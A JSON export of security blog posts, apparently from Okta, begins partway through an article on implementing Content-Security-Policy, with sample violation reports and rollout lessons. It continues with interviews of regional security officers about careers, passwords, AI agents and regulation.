\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sample violation: Where Content-Security-Policy (CSP) did not intercept:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    \\\"csp-report\\\": {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"        \\\"effective-directive\\\": \\\"connect-src\\\",\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"        \\\"original-policy\\\": \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"[truncated]\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"        \\\"blocked-uri\\\": \\\"https://mail.google.com/mail/feed/atom/\\\",\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"        \\\"source-file\\\": \\\"user-script\\\",\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"        \\\"line-number\\\": 5,\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"        \\\"column-number\\\": 16842\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    }\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"}\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sample violation: Where Content-Security-Policy (CSP) intercepted: 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Content-Security-Policy securely blocks known malicious scripts such as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://hackerdose.com/malware/scriptcdn-net-malware/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"this one\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that was reported to us by report-uri. The example below illustrates a truncated excerpt CSP interception, adding to the environment’s security assurance posture:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    \\\"csp-report\\\": {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"        \\\"effective-directive\\\": \\\"script-src-elem\\\",\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"        \\\"Original-policy\\\":\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" [truncated]\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"        \\\"blocked-uri\\\": \\\"https://3001.scriptcdn.net/code/static/1\\\",\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"        \\\"line-number\\\": 7,\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"        \\\"column-number\\\": 47,\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"        \\\"status-code\\\": 
200\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    }\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"}\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Internal forward requests\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A request may go through the interceptor chain several times when forwarded internally. This can create complications if CSP headers are computed each time, especially if the computed header changes or is removed, since it cannot be unset once set. Complications arise when a page that is customizable by administrators is forwarded to a page that is not customizable or the other way around, as each page requires a different CSP. In our use case, we rolled out a base policy containing frame-ancestors which was used as a way to revert an incorrectly-computed policy due to forwards.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Testing\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In order to set a specific policy for a specific customer to perform thorough live testing and debugging, we leverage \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.baeldung.com/java-management-extensions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Java Management Extensions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (JMX) because it gives us the ability to modify the CSP policy live in the application while on a discovery call with 
customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Selenium tests are considered to be of great importance - without these tests, something is likely to break in production when one least expects it. We built a framework that allows us to fail a Selenium test when a CSP error is present in the browser console.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Customized content\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s admin console user interface (UI) allows the admin to customize the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/settings/customizations-configure-csp.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Content-Security-Policy\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (CSP) for customizable pages. This encourages admins to create a CSP that allows their customizations to execute, and to toggle that policy between Content-Security-Policy-Report-Only and Content-Security-Policy. 
Also, they have the option to provide their own reporting URL for browser-based violation reports.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Directives\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Navigational directives such as “\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"frame-ancestors\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"” should always be added to prevent a malicious actor from attempting to iFrame not only html content, but also APIs. We recommend fetch directives only for endpoints that return html content, considering the downside of non-html content causing an increase in network traffic due to larger header size in the response.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Header size limitations\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"API gateways such as AWS API, Google Cloud Apigee API and Kong API Gateway all have limitations on the response header size ranging from 4KB to 128KB. With the introduction of nonces to tackle unsafe-inline, the response header size can surpass 4KB. 
Special consideration must be taken with customers using API gateways to allow for a higher response size.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Rollout Challenges\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In an effort to share our lessons learned, the following subsections capture rollout challenges encountered throughout each of the three above-listed configuration methods:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Unsafe-eval\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tackling unsafe-eval is the first step in putting a stop to new code that is not templated. The next step is to track each existing violation and to remove all the exemptions from the linting allow-list. The last step is to remove the unsafe-eval keyword from the policy.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Unsafe-inline\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Expect a significant impact if unsafe-inline is removed from the policy. One key risk in the removal is a high probability of user impact if the policy is incorrect. Impacts could include blocking an inline-script or inline-style on a page which creates a bad user experience (UX) or even cause a page not to load properly. For third-party integrations that require unsafe-inline for inline-script or inline-style, it’s best to request the vendor to fix their code to not require unsafe-inline, otherwise, you’re stuck with inherited poor practices. 
If an integration is required such as Pendo or Mapbox, it may take time for the vendor to implement a fix which removes the unsafe-inline/unsafe-eval requirement.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The approach we preferred was to empower each team to roll out their endpoints by using annotations which control whether a nonce is added to script-src and style-src for both Content-Security-Policy-Report-Only and Content-Security-Policy. The following CSP example can be slow to roll out, but it keeps the risk low by letting each endpoint be tested independently:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"@RequestMapping(value = \\\"/api/v1/object\\\", method = RequestMethod.GET)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"@ScriptSrcNonce(policy = {ScriptSrcNoncePolicy.SCRIPT_SRC_NONCE_REPORT_ONLY, ScriptSrcNoncePolicy.SCRIPT_SRC_NONCE_ENFORCED}, switchProperty = \\\"team.<name>.<endpoint>kill.switch.enableScriptSrcNonce\\\")\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"public String listObjectProperties(ModelMap model) {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"…\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"}\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Recommendations\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recommend the use of feature flags to control various parts of the CSP, and cloud configuration knobs for added control during deployment. 
When rolling out, we recommend a slower pace with guardrails such as enabling Continuous Integration (CI), using development environments, performing live testing with specific customer configurations using JMX as mentioned above, and lastly, in production environments. When monitoring, we recommend incrementally adjusting the policy and repeating as needed. As in most rollout plans, focus on the largest customer impact on the initial rollout in order to deploy a policy, then improve the policy over time, working closely with customers to debug issues as they arise.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Lastly, we’d recommend being prepared to remediate by rolling back the CSP to a stable state. Knobs such as feature flags and cloud configurations, as mentioned above, are very important for rolling back to a working, functional state. CSPs can be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://csp-evaluator.withgoogle.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"evaluated\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in real time for continuous improvement.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Conclusion\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the end, is implementing Content-Security-Policy worth all the effort? 
From our security teams to yours, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"yes!\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://research.google/pubs/csp-is-dead-long-live-csp-on-the-insecurity-of-whitelists-and-the-future-of-content-security-policy/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"top security vulnerability\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", being Cross-Site Scripting (XSS) in modern web applications, is combatted at the framework-level by a strong CSP. They’re deployed for stronger, added security in preparation for the long haul against today’s evolving threats.  Due to its importance, we’re seeing an increase in customer requests for custom domains. Content-Security-Policy continues to be a security priority at Okta with continued security investigation, enhancement and monitoring in an effort to secure customer data.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Content-Security-Policy (CSP) is essentially allow-list policy that dictates what a web page can load. CSP is complex to implement and rollout - even a minor mistake could mean that important parts of the page will not load, which in Okta’s case could mean trouble authenticating. This blog article aims to provide a glimpse into our secure implementation journey and guidance for the industry based on lessons learned."},"updatedAt":"2025-03-05T14:35:48.605Z","secAuthor":[{"id":"81ed5b4f-5c86-51c2-b040-63d849a0f90c","bio":{"bio":"<p> Mihai Iacob is a Software Engineer on the Engineering Security team at Okta. His extensive background in cybersecurity includes secure software development, encryption and key management, audit, authorization model, web security, and content security policy. 
He contributes to the development and implementation of robust security measures that safeguard our users’ data and privacy. Mihai’s interests include participating in Okta’s internal bug bounty program and hackathons.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5eXScMSnppzUzRz81kzfvr/53ca739875b6b09e70613b52abb483f3/IMG_-nw9dov.jpg"},"name":"Mihai Iacob","jobTitle":"Software Engineer","slug":"/hackers/mihai-iacob","node_locale":"en"},{"id":"f62bb825-00bd-5b3f-8231-5c52be7327cc","bio":{"bio":"<p> Bryan Honan is the Manager, Customer Assurance, EMEA region at Okta. The Customer Assurance team working in Security Trust & Culture is responsible for providing support to Okta’s growing customer base on inquiries pertaining to Security and Compliance. Backed by CISSP and CCSK, he leverages 10+ years of IT and Security experience. Having worked for companies in several different industries, he is able to advise Okta’s customers from both a technical and business perspective.  In his downtime, he enjoys traveling around Europe.</p>"},"image":{"url":"https://downloads.ctfassets.net/kbkgmx9upatd/3GRebaQAYbzK6Ov5wXvWfN/c1d62a925b98b09b09e00242c8e5f3af/IMG_5201_2.jpg"},"name":"Bryan Honan","jobTitle":"Manager, Customer Assurance EMEA","slug":"/hackers/bryan-honan","node_locale":"en"},{"id":"ea48a12c-95dd-5fbd-acfc-7e87829aef98","bio":{"bio":"<p> Arun is a Senior Manager, Engineering Security at Okta. As a founding member of this team, he’s familiar with driving security strategy and execution across the company’s engineering organization. With 15+ years of experience, Arun specializes in security architecture, secure software development, risk management, and security operations. He holds CISSP, CEH, and an Advanced Cloud Security Practitioner credential, with expertise in web security, cloud infra security, cryptography, and secure identity frameworks. 
Arun has successfully led large-scale, cross-functional security initiatives, integrating security seamlessly into agile development and is passionate about building scalable security frameworks and empowering teams to achieve security excellence. Outside of work, Arun enjoys flight simulation and refining his virtual piloting skills, driven by his passion for the skies.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/33cawOQQoY7WXgyS1f4emK/0e8108436d3fee48a46e4f640377c7cc/Image_from_iOS.jpg"},"name":"Arun Kumar Elengovan","jobTitle":"Sr. Software Development Manager, Engineering Security","slug":"/hackers/arun-kumar-elengovan","node_locale":"en"}]},{"slug":"/articles/2025/02/cso-conversations-stephen-mcdermid","id":"51448245-0864-5dad-a3e1-612f9b546fa1","title":"CSO Conversations: Stephen McDermid, Regional CSO of EMEA","date":"2025-02-26T11:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\"CSO Conversations is a blog series interviewing Okta’s Regional CSOs supporting David Bradbury, Okta’s Chief Security Officer in providing the best service for our customers. Okta’s Regional CSOs are integral to Okta’s Security Trust and Culture team, building and strengthening trusted advisor relationships with global security thought leadership.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"What motivated your career pursuit in cybersecurity?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"While working as Head of IT, the business needed to achieve ISO27001 in order to meet our government contractual requirements. 
It was an area I had always had an interest in, and so we brought in some external consultants to help us achieve the certification, but also to educate us on the ISO approach. After we delivered ISO27001, I was then asked to deliver PCI-DSS for our much larger Tier-1 parent company who had acquired us the previous year, and so this brought a whole new dimension to understanding our application, infrastructure and security challenges. As part of agreeing to do this and successfully delivering the certification, I asked the business to offer me the recently-vacant Information Security opportunity and this led to my first Information Security role!\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Are there any emerging trends or technologies that have you particularly interested?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"It’s impossible to avoid the rise of AI and specifically, AI Agents. By the end of 2025, we’ll be living in a world with billions of autonomous AI Agents acting on our behalf. There are important questions that the cybersecurity industry needs to answer - what are these bots doing? What information do they have access to? And, how do we set and control the conditions and parameters around what information they can share, with who, and under what circumstances?\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"What’s interesting is that right now, all these questions are up in the air. These bots don’t have the benefit of basic cybersecurity awareness training. They don’t have that human sixth sense that tells us something just might not be right. They can’t think for themselves. 
All it takes is one rogue prompt for an AI Agent to mistakenly share sensitive, personal or financial information with another agent, and things could quickly escalate. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"How has your previous experience in cloud computing shaped your approach to cybersecurity today?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Having a background in on-prem and cloud technologies definitely helps when it comes to cybersecurity. Threats span across technology stacks and so understanding how these threats can affect different elements is key. However, understanding the protections and benefits that cloud computing can bring is just as important and so being able to help our customers understand both sides is pivotal to my role.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"What are your thoughts on traditional passwords in today’s technology landscape, given modernized threats?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"I think I’m aligned with most when I say the sooner we can get rid of them, the better. I don’t think it’s the catch-all, but certainly when we see over 80% of breaches coming from compromised passwords, it’s time for change! I think they will always be needed in some areas of technology, but the governance and visibility has advanced massively over recent years and so we need to ensure tighter controls around them. 
Not just the typical complexity and policies, but where they are used from, when they are used, during use and even after use, we can apply a lot more governance!\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"What trends are you seeing in cybersecurity relating to your region?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"It’s hard to see beyond the buzz of AI and all that it brings, but with the heavy regulation we have in the European Union, we have a number of new regulations such as the EU AI Act that adds additional levels of protection and complexity. Everyone has a lot of questions of how they can be compliant and how suppliers and partners can help. We’re seeing a growing trend of compliance automation and engineering to navigate these challenges and the more we can simplify the regulations and evidence compliance, the better.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"In \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.computerweekly.com/news/366617120/The-Security-Interviews-Stephen-McDermid-Okta\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"value\":\"your recent interview\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\", you referred to the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"value\":\"Secure Identity Commitment\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" and Okta’s transparency. 
How important is it to be transparent in your role as Regional CSO?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Transparency is a critical pillar of our cybersecurity strategy and how we work with our customers. Even though we have people who are incredible security experts at Okta, ultimately, security is a people business. It’s hearts and minds, and our focus on being transparent, especially in times of crisis, is a key differentiator here.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"To ensure Okta has a strong security culture, we’ve spent a lot of time explaining the why behind the changes we are making, how it will affect our teams, and importantly, how it will benefit our customers. Ensuring everyone is on the same page internally is vital to ensuring we deliver consistent messaging and communications to customers. In the many hundreds of conversations I’ve had with customers, they’ve recognized, appreciated and thanked us for our openness and collaboration.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"If you could provide a few short cybersecurity words of wisdom to Okta customers, what would they be?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Identity is part of every project, from application modernisations, to infrastructure migration, to business operations and staff training! It’s important to understand how identities in these projects tie into your strategic goals, and more importantly, how you are applying governance, control and visibility of what’s happening across them. 
It’s in these dark corners of IT transformation that dangers lie and shining a light on them thoroughly and regularly ensures confidence against identity attacks.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"What are some healthy cybersecurity habits you’ve gotten your friends and/or family to adopt?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The idea that every website needs to know your date of birth, your address or even your real name has always been alien to me. Using aliases, fake dates of birth and addresses across the multiple website registrations of today's world has always been something I’ve recommended. Obviously, applications like banking or governmental sites are the exception, but the website that you sign up to for a newsletter doesn’t need the real data! So my advice has always been to consider what you're sharing and with whom, especially in today's world where so many applications or websites are free, which means the cost to use their service is your personal data.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"What do you think may be some key changes the cybersecurity industry sees this coming year?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We need a mindset shift across the cybersecurity industry with far more collaboration between industry players. 
We face an unprecedented threat environment, and this is before the potential risks that AI Agents bring to the table.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We need to agree to more standards, best practices, and frameworks around cloud applications and how they communicate with each other so that they are secure by default. A single cybersecurity vendor cannot achieve this alone. We’ve already started on this by working with others in the Interoperability Profiling for Secure Identity in the Enterprise (IPSIE) working group in the OpenID Foundation to help standardize secure identity management across SaaS solutions and vendors.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Stephen McDermid was recently interviewed by \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.computerweekly.com/news/366617120/The-Security-Interviews-Stephen-McDermid-Okta\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Computer Weekly\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" on how Okta is championing a secure-by-design approach, emphasizing the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta Secure Identity Commitment (OSIC)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" and the importance of building a strong security culture. 
Stephen was also featured by \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.itpro.com/business/policy-and-legislation/a-csos-perspective-on-dora-compliance-and-where-to-go-from-here\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"ITPro\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", capturing a CSO’s perspective on DORA compliance.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"CSO Conversations is a blog series interviewing Okta’s Regional CSOs supporting David Bradbury, Okta’s Chief Security Officer in providing the best service for our customers. Okta’s Regional CSOs are integral to Okta’s Security Trust and Culture team, building and strengthening trusted advisor relationships with global security thought leadership."},"updatedAt":"2025-02-26T17:32:04.538Z","secAuthor":[{"id":"4bd66bb8-bbb2-5ab6-895d-32c670d02166","bio":{"bio":"<p> </p><p>Stephen McDermid, CSO EMEA has led and been responsible for several enterprise-wide transformations ranging from National Government transformation projects to ISO27001 and PCI-DSS accreditation across multiple sites. He's taken his hands-on knowledge and expertise and used them to help organizations manage security across a broad range of disciplines and ensure senior stakeholders understand the risks and, more importantly, the opportunities available to their business. Stephen has worked with some of the largest organizations across military, banking, government, and enterprise sectors, to enable business transformation and growth. 
Stephen spends a lot of time on or near water, not just because of the rain; he holds a powerboat license and loves exploring the West Coast waters of Scotland.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/3dK8xXUsNpD0udBFZ9FyRL/c7b20c4103a0b02e73c8167676403f89/Stephen-McDermid.png"},"name":"Stephen McDermid","jobTitle":"Regional CSO, EMEA","slug":"stephen-mcdermid","node_locale":"en"}]},{"slug":"/articles/2025/02/cso-conversations-keiko-itakura","id":"ca620f89-1a45-5734-9691-5eee2411ddc9","title":"CSO Conversations: Keiko Itakura, Regional CSO of Japan","date":"2025-02-12T11:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"CSO Conversations is a blog series interviewing Okta’s Regional CSOs supporting David Bradbury, Okta’s Chief Security Officer in providing the best service for our customers. Okta’s Regional CSOs are integral to Okta’s Security Trust and Culture team, building and strengthening trusted advisor relationships with global security thought leadership.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What motivated your career pursuit in cybersecurity at Okta?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Logging in is the first step in a threat scenario, and identity represents the person themselves. In one survey, it was found that over 80% of security incidents were related to identity credentials. 
